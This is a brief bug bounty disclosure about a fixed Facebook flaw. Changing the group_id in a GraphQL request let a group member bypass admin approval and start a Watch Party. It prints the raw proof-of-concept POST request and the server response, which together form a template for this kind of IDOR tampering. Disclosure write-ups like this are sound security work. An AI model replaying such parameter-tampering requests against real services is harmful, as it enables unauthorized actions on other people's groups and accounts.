[Facebook] Bypass Admin approval for Watch Party

 

A group member was able to bypass post approvals and post a Watch Party.

POC -

A request going to the following GraphQL endpoint -

=====================================================================

=====================================================================

POST /graphql

HOST: facebook.com

av=XXX&__user=XXX&__a=1&variables={"input":{"client_mutation_id":"2","actor_id":"XXX","composer_session_id":"f22386d2e87fd5e","creator_actor_id":"XXX","custom_name":null,"group_id":"XXX","video_ids":["XXX"]}}&doc_id=1910407048979275

=====================================================================

=====================================================================

Where the "group_id" could be changed (IDOR).

The response would be -

=====================================================================

=====================================================================

{"data": {"group_living_room_create": {"client_mutation_id": "2","living_room": {"__typename": "LivingRoomSession","id": "XXXXX"}

=====================================================================

=====================================================================

The post will not appear on the discussion page of the group. But an attacker can invite the members of the group and can send the link of the post which can be accessible by the member and they can attend the watch party.
Timeline -
Reported - Friday, June 22, 2018
Marked Duplicate - Friday, June 22, 2018
This is now fixed.